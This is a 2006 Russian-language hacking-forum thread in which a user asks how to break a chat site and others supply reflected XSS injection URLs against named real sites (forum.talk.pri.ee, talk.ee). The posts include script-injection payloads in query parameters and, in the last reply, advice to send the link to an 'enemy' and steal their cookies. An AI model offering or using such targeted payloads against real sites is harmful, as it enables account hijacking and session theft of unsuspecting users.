ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.08.2006, 11:53
Аватар для Doredox
Doredox
Новичок
Регистрация: 03.08.2006
Сообщений: 3
Провел на форуме:
18515

Репутация: 0
По умолчанию

Все про него слышат в первый раз, потому что автор судя повсему изменил подпись. Поищи внешние признаки сходства с разными чатами, наблюдай за адресной строкой, если там пишутся какието файлы, поищи в гугле подобные и ищи оригинальное название чата, способов уйма.
 
Ответить с цитированием

  #12  
Старый 08.08.2006, 16:19
Аватар для Dagon
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию

Цитата:
Сообщение от De_X  
ну а тада как этот чать кикнуть (Сломать нах)
может тебе это как-нибудь поможет:
xss в форуме этих чатовцев

Код:
http://forum.talk.pri.ee/cal_lite.php?cl_d=3\"><script>alert(1)</script>

Последний раз редактировалось Dagon; 08.08.2006 в 18:37..
 
Ответить с цитированием

  #13  
Старый 08.08.2006, 18:35
Аватар для De_X
De_X
Banned
Регистрация: 30.11.2005
Сообщений: 95
Провел на форуме:
279326

Репутация: -12
По умолчанию

Цитата:
Сообщение от Dagon  
может тебе это как-нибудь поможет:
xxs в форуме этих чатовцев

Код:
http://forum.talk.pri.ee/cal_lite.php?cl_d=3"><script>alert(1)</script>&cl_m=08%22%3E&cl_y=2006&mode=display
Ок спасибо всем за помошь! Буду пробовать и в тоде время учиццца!
 
Ответить с цитированием

  #14  
Старый 08.08.2006, 18:56
Аватар для Dagon
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию

есть в этом чате еще активная xss в профиле. Работает только тогда, когда ты сам свой профиль редактируешь.

вот тут еще нашел xss

http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1

работает тогда, когда ты в чате.

Последний раз редактировалось Dagon; 08.08.2006 в 18:59..
 
Ответить с цитированием

  #15  
Старый 10.08.2006, 01:12
Аватар для De_X
De_X
Banned
Регистрация: 30.11.2005
Сообщений: 95
Провел на форуме:
279326

Репутация: -12
По умолчанию

Цитата:
Сообщение от Dagon  
есть в этом чате еще активная xss в профиле. Работает только тогда, когда ты сам свой профиль редактируешь.

вот тут еще нашел xss

http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1

работает тогда, когда ты в чате.
Блин сидел мазги ипал чё куда http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1
прописывать?
 
Ответить с цитированием

  #16  
Старый 10.08.2006, 01:16
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Ну если в начале хттп, то путем несложный умо заключений можно определить что это нужно вписывать в адресную строку
__________________
..
 
Ответить с цитированием

  #17  
Старый 10.08.2006, 02:27
Аватар для De_X
De_X
Banned
Регистрация: 30.11.2005
Сообщений: 95
Провел на форуме:
279326

Репутация: -12
По умолчанию

эт я понимаю! там мыскакивает окно шму ок и появляется экран чёрный с окошком инфо! как я понял http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1 &UserName=test1 это должен быть чейто логин? но всёравно нечё я и свой вписывал и чужой
 
Ответить с цитированием

  #18  
Старый 10.08.2006, 03:33
Аватар для DaemoniZ
DaemoniZ
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме:
285050

Репутация: 16
По умолчанию

Цитата:
Сообщение от De_X  
эт я понимаю! там мыскакивает окно шму ок и появляется экран чёрный с окошком инфо! как я понял http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1 &UserName=test1 это должен быть чейто логин? но всёравно нечё я и свой вписывал и чужой
Блин... Смотрите видео уважаемый. Учитесь.
http://video.antichat.ru/1_0.html
(даете ссылочку недругу, тырите его куки, а дальше разберетесь)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Talk ICQ и SysMessenger NTL ICQ 0 28.05.2005 17:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ